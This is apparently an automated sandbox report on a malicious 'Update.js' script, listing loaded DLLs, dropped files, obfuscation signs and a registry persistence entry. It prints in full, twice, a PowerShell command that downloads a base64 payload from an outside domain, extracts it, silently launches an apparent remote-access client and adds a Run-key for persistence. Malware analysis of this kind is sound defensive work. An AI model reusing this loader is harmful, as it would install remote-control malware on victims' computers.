Source: C:\Windows\System32\wscript.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: scrrun.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: slc.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasapi32.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasman.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rtutils.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: slc.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Section loaded: pcicl32.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Section loaded: shfolder.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Section loaded: pcichek.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Section loaded: pcicapi.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Section loaded: wsock32.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Section loaded: msvcr100.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Section loaded: msvcr100.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Section loaded: oleacc.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Section loaded: netapi32.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Section loaded: samcli.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Section loaded: dbghelp.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Section loaded: wtsapi32.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Section loaded: dbgcore.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Section loaded: nsmtrace.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Section loaded: nslsp.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Section loaded: devobj.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Section loaded: pcihooks.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Section loaded: textshaping.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Section loaded: winsta.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Section loaded: riched32.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Section loaded: riched20.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Section loaded: usp10.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Section loaded: msls31.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Section loaded: pciinv.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Section loaded: firewallapi.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Section loaded: fwbase.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Section loaded: fwpolicyiomgr.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}\InprocServer32 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File written: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\NSM.ini Jump to behavior
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe File opened: C:\Windows\SysWOW64\riched32.dll Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll Jump to behavior
Source: Update.js Static file information: File size 4053374 > 1048576
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\msvcr100.dll Jump to behavior
Source: Binary string: msvcr100.i386.pdb source: powershell.exe, 00000008.00000002.1567156116.0000026C0059F000.00000004.00000800.00020000.00000000.sdmp, client32.exe, client32.exe, 0000000A.00000002.2533582731.000000006CCA1000.00000020.00000001.01000000.0000000C.sdmp, msvcr100.dll.8.dr
Source: Binary string: E:\nsmsrc\nsm\1210\1210f\client32\Release\PCICL32.pdb source: client32.exe, 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmp, PCICL32.DLL.8.dr
Source: Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\htctl32.pdbL source: powershell.exe, 00000008.00000002.1567156116.0000026C0059F000.00000004.00000800.00020000.00000000.sdmp, client32.exe, 0000000A.00000002.2532853143.000000006CAC0000.00000002.00000001.01000000.0000000D.sdmp, HTCTL32.DLL.8.dr
Source: Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\tcctl32.pdb source: powershell.exe, 00000008.00000002.1567156116.0000026C00CEF000.00000004.00000800.00020000.00000000.sdmp, TCCTL32.DLL.8.dr
Source: Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\Full\pcichek.pdb source: powershell.exe, 00000008.00000002.1567156116.0000026C00BC8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1567156116.0000026C00BBE000.00000004.00000800.00020000.00000000.sdmp, client32.exe, 0000000A.00000002.2538791982.00000000747F2000.00000002.00000001.01000000.0000000B.sdmp, PCICHEK.DLL.8.dr
Source: Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\htctl32.pdb source: powershell.exe, 00000008.00000002.1567156116.0000026C0059F000.00000004.00000800.00020000.00000000.sdmp, client32.exe, 0000000A.00000002.2532853143.000000006CAC0000.00000002.00000001.01000000.0000000D.sdmp, HTCTL32.DLL.8.dr
Source: Binary string: E:\nsmsrc\nsm\1200\1200\client32\Release\client32.pdb source: client32.exe, 0000000A.00000002.2489223815.0000000000442000.00000002.00000001.01000000.00000008.sdmp, client32.exe, 0000000A.00000000.1514998417.0000000000442000.00000002.00000001.01000000.00000008.sdmp, client32.exe.8.dr
Source: Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\tcctl32.pdbP source: powershell.exe, 00000008.00000002.1567156116.0000026C00CEF000.00000004.00000800.00020000.00000000.sdmp, TCCTL32.DLL.8.dr
Source: Binary string: E:\nsmsrc\nsm\1210\1210\ctl32\Release\pcicapi.pdb source: powershell.exe, 00000008.00000002.1567156116.0000026C00B9F000.00000004.00000800.00020000.00000000.sdmp, client32.exe, 0000000A.00000002.2538169520.0000000073A85000.00000002.00000001.01000000.0000000A.sdmp, pcicapi.dll.8.dr
Source: Binary string: E:\nsmsrc\nsm\1210\1210f\client32\Release\PCICL32.pdb source: client32.exe, 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmp, PCICL32.DLL.8.dr

Data Obfuscation
barindex
Found suspicious powershell code related to unpacking or dynamic code loading
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: FromBase64String($QBOSAXLNLPU);$asd = Get-Random -Minimum -5 -Maximum 12; $JDKPRJIL=[System.Environment]::GetFolderPath('ApplicationData')+'\EQMIUFUUUCW'+$asd;if (!(Test-Path $JDKPRJIL -PathType Conta
Suspicious powershell command line found
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $VWKXIVYIUK='https://ggoryo.com/trade/da.php?9800';$QBOSAXLNLPU=(New-Object System.Net.WebClient).DownloadString($VWKXIVYIUK);$ZRPU=[System.Convert]::FromBase64String($QBOSAXLNLPU);$asd = Get-Random -Minimum -5 -Maximum 12; $JDKPRJIL=[System.Environment]::GetFolderPath('ApplicationData')+'\EQMIUFUUUCW'+$asd;if (!(Test-Path $JDKPRJIL -PathType Container)) { New-Item -Path $JDKPRJIL -ItemType Directory };$p=Join-Path $JDKPRJIL 'CXCC.zip';[System.IO.File]::WriteAllBytes($p,$ZRPU);try { Add-Type -A System.IO.Compression.FileSystem;[System.IO.Compression.ZipFile]::ExtractToDirectory($p,$JDKPRJIL)} catch { Write-Host 'Failed: ' + $_; exit};$CV=Join-Path $JDKPRJIL 'client32.exe';if (Test-Path $CV -PathType Leaf) { Start-Process -FilePath $CV} else {Write-Host 'No exe.'};$fd=Get-Item $JDKPRJIL -Force; $fd.attributes='Hidden';$s=$JDKPRJIL+'\client32.exe';$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='DIWFE';$ASDASD='String';New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $ASDASD;
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $VWKXIVYIUK='https://ggoryo.com/trade/da.php?9800';$QBOSAXLNLPU=(New-Object System.Net.WebClient).DownloadString($VWKXIVYIUK);$ZRPU=[System.Convert]::FromBase64String($QBOSAXLNLPU);$asd = Get-Random -Minimum -5 -Maximum 12; $JDKPRJIL=[System.Environment]::GetFolderPath('ApplicationData')+'\EQMIUFUUUCW'+$asd;if (!(Test-Path $JDKPRJIL -PathType Container)) { New-Item -Path $JDKPRJIL -ItemType Directory };$p=Join-Path $JDKPRJIL 'CXCC.zip';[System.IO.File]::WriteAllBytes($p,$ZRPU);try { Add-Type -A System.IO.Compression.FileSystem;[System.IO.Compression.ZipFile]::ExtractToDirectory($p,$JDKPRJIL)} catch { Write-Host 'Failed: ' + $_; exit};$CV=Join-Path $JDKPRJIL 'client32.exe';if (Test-Path $CV -PathType Leaf) { Start-Process -FilePath $CV} else {Write-Host 'No exe.'};$fd=Get-Item $JDKPRJIL -Force; $fd.attributes='Hidden';$s=$JDKPRJIL+'\client32.exe';$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='DIWFE';$ASDASD='String';New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $ASDASD; Jump to behavior
Contains functionality to dynamically determine API calls
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Code function: 10_2_11029BB0 GetTickCount,LoadLibraryA,GetProcAddress,SetLastError,_malloc,GetProcAddress,GetLastError,_free,_malloc,GetProcAddress,GetProcAddress,InternetOpenA,SetLastError,SetLastError,SetLastError,_free,GetProcAddress,SetLastError,GetProcAddress,InternetConnectA,GetProcAddress,SetLastError,SetLastError,GetProcAddress,SetLastError,GetProcAddress,SetLastError,GetLastError,GetProcAddress,SetLastError,GetLastError,GetDesktopWindow,GetProcAddress,SetLastError,GetProcAddress,SetLastError,GetProcAddress,SetLastError,FreeLibrary, 10_2_11029BB0
PE file contains sections with non-standard names
Source: PCICL32.DLL.8.dr Static PE information: section name: .hhshare
Uses code obfuscation techniques (call, push, ret)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 8_2_00007FFECBB563BA push E85E4D00h; ret 8_2_00007FFECBB563C9
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 8_2_00007FFECBB5882B push FFFFFFCAh; retf 8_2_00007FFECBB5882D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 8_2_00007FFECBB5883B push FFFFFFCAh; retf 8_2_00007FFECBB5883D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 8_2_00007FFECBB5869B push FFFFFFCAh; retf 8_2_00007FFECBB5869D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 8_2_00007FFECBB586AB push FFFFFFCAh; retf 8_2_00007FFECBB586AD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 8_2_00007FFECBB52610 pushad ; iretd 8_2_00007FFECBB6D242
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 8_2_00007FFECBDC474C push ds; retf 8_2_00007FFECBDC474F
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 8_2_00007FFECBE523B1 push FFFFFFCDh; retf 8_2_00007FFECBE523B3
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 8_2_00007FFECBE5278C push FFFFFFCDh; retf 8_2_00007FFECBE5278E
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 8_2_00007FFECBE5236B push FFFFFFCDh; retf 8_2_00007FFECBE5236D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 8_2_00007FFECBE5131F push edx; iretd 8_2_00007FFECBE51321
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 8_2_00007FFECBE54B0A push edx; iretd 8_2_00007FFECBE54B0C
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 8_2_00007FFECBE5226E push FFFFFFCDh; retf 8_2_00007FFECBE52270
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 8_2_00007FFECBE521BD push FFFFFFCDh; retf 8_2_00007FFECBE521EB
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 8_2_00007FFECBE52589 push FFFFFFCDh; retf 8_2_00007FFECBE5258B
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 8_2_00007FFECBE5216B push FFFFFFCDh; retf 8_2_00007FFECBE5216D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 8_2_00007FFECBE524C2 push FFFFFFCDh; retf 8_2_00007FFECBE524C4
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 8_2_00007FFECBFA7937 push ebx; retf 8_2_00007FFECBFA793A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 8_2_00007FFECBFA4D5F push eax; retf 8_2_00007FFECBFA4D79
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 8_2_00007FFECC4B0048 push eax; retf 8_2_00007FFECC4B0049
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 8_2_00007FFECC4B7D3E push esi; ret 8_2_00007FFECC4B7D67
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Code function: 10_2_1116FF15 push ecx; ret 10_2_1116FF28
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Code function: 10_2_1116AE09 push ecx; ret 10_2_1116AE1C
Source: msvcr100.dll.8.dr Static PE information: section name: .text entropy: 6.909044922675825
Drops PE files
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\PCICL32.DLL Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\remcmdstub.exe Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\TCCTL32.DLL Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\HTCTL32.DLL Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\PCICHEK.DLL Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\msvcr100.dll Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\pcicapi.dll Jump to dropped file
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Code function: 10_2_6CA97030 ctl_open,LoadLibraryA,InitializeCriticalSection,CreateEventA,CreateEventA,CreateEventA,CreateEventA,WSAStartup,_malloc,_memset,_calloc,_malloc,_memset,_malloc,_memset,GetTickCount,CreateThread,SetThreadPriority,GetModuleFileNameA,GetPrivateProfileIntA,GetModuleHandleA,CreateMutexA,timeBeginPeriod, 10_2_6CA97030
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Code function: 10_2_11128B10 GetMessageA,Sleep,OpenSCManagerA,DispatchMessageA,OpenServiceA,CloseServiceHandle,StartServiceA,GetLastError,CloseServiceHandle,CloseServiceHandle,GetLastError,CloseServiceHandle,GetLastError, 10_2_11128B10
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run DIWFE Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run DIWFE Jump to behavior
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Code function: 10_2_11139ED0 GetCurrentThreadId,IsWindowVisible,IsWindow,IsWindowVisible,IsWindowVisible,GetForegroundWindow,EnableWindow,EnableWindow,EnableWindow,SetForegroundWindow,FindWindowA,IsWindowVisible,IsWindowVisible,IsIconic,GetForegroundWindow,SetForegroundWindow,EnableWindow,GetLastError,GetLastError,GetLastError,GetTickCount,GetTickCount,FreeLibrary, 10_2_11139ED0
